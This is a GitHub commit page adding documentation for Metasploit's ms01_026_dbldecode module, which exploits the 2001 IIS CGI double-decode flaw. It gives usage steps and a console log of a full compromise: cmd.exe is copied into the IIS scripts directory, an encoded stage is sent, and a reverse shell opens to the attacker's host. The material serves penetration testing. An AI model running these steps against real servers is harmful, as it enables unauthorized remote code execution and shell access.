Skip to content

Commit f7209bf

Browse files
committed
Land #16724, Modernize ms01_026_dbldecode
Use HttpClient; remove meterpreter code; fix stager
2 parents 5b8680e + ec24457 commit f7209bf

File tree

3 files changed

+206
-169
lines changed

3 files changed

+206
-169
lines changed

Gemfile.lock

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -351,7 +351,7 @@ GEM
351351
metasm
352352
rex-arch
353353
rex-text
354-
rex-exploitation (0.1.30)
354+
rex-exploitation (0.1.31)
355355
jsobfu
356356
metasm
357357
rex-arch
Lines changed: 71 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,71 @@
1+
## Vulnerable Application
2+
3+
This module will execute an arbitrary payload on a Microsoft IIS installation
4+
that is vulnerable to the CGI double-decode vulnerability of 2001.
5+
6+
This module has been tested successfully on:
7+
8+
* Windows 2000 Professional (SP0) (EN)
9+
* Windows 2000 Professional (SP1) (AR)
10+
* Windows 2000 Professional (SP1) (CZ)
11+
* Windows 2000 Server (SP0) (FR)
12+
* Windows 2000 Server (SP1) (EN)
13+
* Windows 2000 Server (SP1) (SE)
14+
15+
Note: This module will leave a Metasploit payload in the IIS scripts directory.
16+
17+
## Verification Steps
18+
19+
1. `use exploit/windows/iis/ms01_026_dbldecode`
20+
1. `set RHOSTS [IP]`
21+
1. `set PAYLOAD windows/shell/reverse_tcp`
22+
1. `set LHOST [IP]`
23+
1. `run`
24+
25+
## Options
26+
27+
### WINDIR
28+
29+
The Windows directory name of the target host.
30+
The directory name will be detected automatically if not set.
31+
32+
### DEPTH
33+
34+
Traversal depth to reach the drive root (default: `2`)
35+
36+
## Scenarios
37+
38+
### Windows 2000 Server (SP0) (FR)
39+
40+
```
41+
msf6 > use exploit/windows/iis/ms01_026_dbldecode
42+
[*] Using configured payload windows/shell/reverse_tcp
43+
msf6 exploit(windows/iis/ms01_026_dbldecode) > set rhosts 192.168.200.175
44+
rhosts => 192.168.200.175
45+
msf6 exploit(windows/iis/ms01_026_dbldecode) > check
46+
[+] 192.168.200.175:80 - The target is vulnerable. Found Windows directory name: winnt
47+
msf6 exploit(windows/iis/ms01_026_dbldecode) > set lhost 192.168.200.130
48+
lhost => 192.168.200.130
49+
msf6 exploit(windows/iis/ms01_026_dbldecode) > run
50+
51+
[*] Started reverse TCP handler on 192.168.200.130:4444
52+
[*] Using Windows directory "winnt"
53+
[*] Copying "\winnt\system32\cmd.exe" to the IIS scripts directory as "EcFJ.exe"...
54+
[*] Command Stager progress - 66.67% done (40/60 bytes)
55+
[*] Command Stager progress - 100.00% done (60/60 bytes)
56+
[*] Triggering payload "qQErEZeB.exe" via a direct request...
57+
[*] Encoded stage with x86/shikata_ga_nai
58+
[*] Sending encoded stage (267 bytes) to 192.168.200.175
59+
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.175:1090) at 2022-06-28 08:34:32 -0400
60+
[!] This exploit may require manual cleanup of 'qQErEZeB.exe' on the target
61+
62+
63+
Shell Banner:
64+
Microsoft Windows 2000 [Version 5.00.2195]
65+
-----
66+
67+
68+
c:\inetpub\scripts>hostname
69+
hostname
70+
win2k-srv-fr
71+
```

0 commit comments

Comments
 (0)